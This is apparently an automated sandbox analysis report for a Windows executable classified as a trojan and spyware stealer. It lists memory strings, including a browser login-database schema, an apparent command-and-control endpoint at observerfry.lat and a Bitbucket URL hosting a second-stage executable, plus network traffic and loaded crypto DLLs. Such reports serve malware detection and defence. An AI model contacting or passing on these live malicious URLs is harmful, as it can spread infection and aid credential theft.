Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Amcache.hve.11.dr	String found in binary or memory: http://upx.sf.net
Source: 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 2oM46LNCOo.exe, 00000002.00000003.1574302041.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886379427.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D50000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
Source: 2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511665760.0000000001572000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: 2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/3S
Source: 2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/_
Source: 2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/f
Source: 2oM46LNCOo.exe, 00000002.00000003.1511687623.0000000001542000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: 2oM46LNCOo.exe, 00000002.00000002.1885827492.00000000012FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0
Source: 2oM46LNCOo.exe, 00000002.00000003.1511602212.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: 2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: 2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: 2oM46LNCOo.exe, 00000002.00000003.1574302041.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886379427.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: 2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 2oM46LNCOo.exe, 00000002.00000003.1574302041.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574459178.0000000001596000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: 2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: 2oM46LNCOo.exe, 00000002.00000003.1425834485.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886070092.000000000151B000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1439414268.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1397400304.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438546515.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1452024343.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1451859378.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574302041.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438667211.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511624035.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1451859378.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1426169334.0000000001529000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1398164398.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1425834485.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1404451499.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511687623.0000000001542000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/
Source: 2oM46LNCOo.exe, 00000002.00000003.1425834485.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1368140153.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1439414268.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1397400304.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1452024343.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1369759598.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438667211.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511624035.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1451859378.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1398164398.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1374925194.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1404451499.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/Q
Source: 2oM46LNCOo.exe, 00000002.00000003.1511687623.0000000001542000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/api
Source: 2oM46LNCOo.exe, 00000002.00000003.1511641547.0000000001596000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511299256.000000000158E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/apis
Source: 2oM46LNCOo.exe, 00000002.00000003.1425834485.000000000158E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/apix
Source: 2oM46LNCOo.exe, 00000002.00000003.1438546515.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1425834485.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/pi
Source: 2oM46LNCOo.exe, 00000002.00000003.1451859378.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/piN
Source: 2oM46LNCOo.exe, 00000002.00000003.1368269136.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1370014291.0000000005D52000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438703314.0000000005D52000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1426026271.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1344435777.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1372032271.0000000005D52000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1368343590.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1374948031.0000000005D52000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat:443/api
Source: 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574459178.0000000001596000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574459178.0000000001596000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: 2oM46LNCOo.exe, 00000002.00000003.1375030220.0000000005E6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 2oM46LNCOo.exe, 00000002.00000003.1375030220.0000000005E6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 2oM46LNCOo.exe, 00000002.00000003.1574302041.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574459178.0000000001596000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574238846.0000000005D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: 2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: 2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1886412666.0000000001597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 2oM46LNCOo.exe, 00000002.00000003.1319992084.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319900927.0000000005D8B000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1319831966.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 2oM46LNCOo.exe, 00000002.00000003.1375451426.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: 2oM46LNCOo.exe, 00000002.00000003.1375030220.0000000005E6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: 2oM46LNCOo.exe, 00000002.00000003.1375030220.0000000005E6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: 2oM46LNCOo.exe, 00000002.00000003.1375030220.0000000005E6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: 2oM46LNCOo.exe, 00000002.00000003.1375030220.0000000005E6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 2oM46LNCOo.exe, 00000002.00000003.1375030220.0000000005E6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.14.36:443 -> 192.168.2.7:49752 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: 2oM46LNCOo.exe	Static PE information: section name:
Source: 2oM46LNCOo.exe	Static PE information: section name: .rsrc
Source: 2oM46LNCOo.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 2012

Source: 2oM46LNCOo.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2oM46LNCOo.exe

Static PE information: Section: ZLIB complexity 0.9995340584150327

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7284

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a47876aa-9d0a-4c4f-9d45-0133afd3a2f7

Jump to behavior

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2oM46LNCOo.exe, 00000002.00000003.1321042220.0000000005D5C000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1320481198.0000000005D79000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1345846753.0000000005D71000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 2oM46LNCOo.exe	Virustotal: Detection: 45%
Source: 2oM46LNCOo.exe	ReversingLabs: Detection: 63%

Source: 2oM46LNCOo.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 2oM46LNCOo.exe	String found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeP

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

File read: C:\Users\user\Desktop\2oM46LNCOo.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\2oM46LNCOo.exe "C:\Users\user\Desktop\2oM46LNCOo.exe"
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 2012

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: dpapi.dll	Jump to behavior
